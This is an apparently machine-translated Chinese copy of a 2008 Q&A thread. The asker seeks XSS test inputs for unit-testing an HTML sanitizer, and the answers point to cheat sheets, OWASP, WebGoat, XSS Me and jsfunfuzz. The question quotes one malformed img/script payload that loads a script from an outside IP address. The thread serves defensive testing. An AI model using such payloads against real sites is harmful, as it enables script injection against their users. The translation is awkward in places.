XSS酷刑測試 - 它存在嗎？

我期待寫HTML消毒殺菌劑，顯然測試/證明它正常工作，我需要一套XSS例子來推銷反對它，看它如何執行。這裏有一個nice example from Coding Horror XSS酷刑測試 - 它存在嗎？

<img src=""http://www.a.com/a.jpg<script type=text/javascript 
src="http://1.2.3.4:81/xss.js">" /><<img 
src=""http://www.a.com/a.jpg</script>"

我知道有一個Mime Torture Test包括與用於檢驗的Mime解碼器附件的幾個嵌套郵件（如果他們能正確地對其進行解碼，然後他們已經被證明的工作）。基本上，我尋找一個XSS的equivilent，即我可以告訴我的殺菌扔狡猾的HTML一系列例子只是爲了確保它的工作原理確定。

如果有人還對如何編寫殺菌任何好的資源（即哪些常見漏洞人們嘗試用等），他們會感激地接受了。

在此先感謝:-)

編輯：對不起，如果這是以前沒有明確，但我一組的折磨測試之後，所以我可以編寫單元測試殺菌器，在瀏覽器中沒有測試它等等。理論來源數據可能來自任何地方 - 不僅僅是瀏覽器。

2008-11-01 JamShady

2008-11-01 16:27:25 RealHowTo

具體爲「XSS備忘單的XML格式」，我錯過了第一次看到該頁面。 – dbr 2008-11-02 13:29:07

XSS Me是一個偉大的Firefox插件，你可以對你的Sanitizer運行。

2008-11-01 16:29:12 Maxam

「XSS Me」的鏈接格式錯誤...正確的URL是https：// addons .mozilla.org/en-US/firefox/addon/7598 – Pafjo 2008-11-01 16:35:05

退房OWASP。他們有XSS如何工作的良好導向，要尋找什麼，甚至WebGoat項目，在那裏你可以嘗試在一個存在漏洞的網站你的手。

2008-11-01 16:33:37 erickson

你可以嘗試傑西Ruderman的jsfunfuzz（http://www.squarefree.com/2007/08/02/introducing-jsfunfuzz/），在你的Javascript拋出隨機數據試圖打破它。看來Firefox團隊已經取得了巨大的成功。

2008-11-01 16:37:20

回答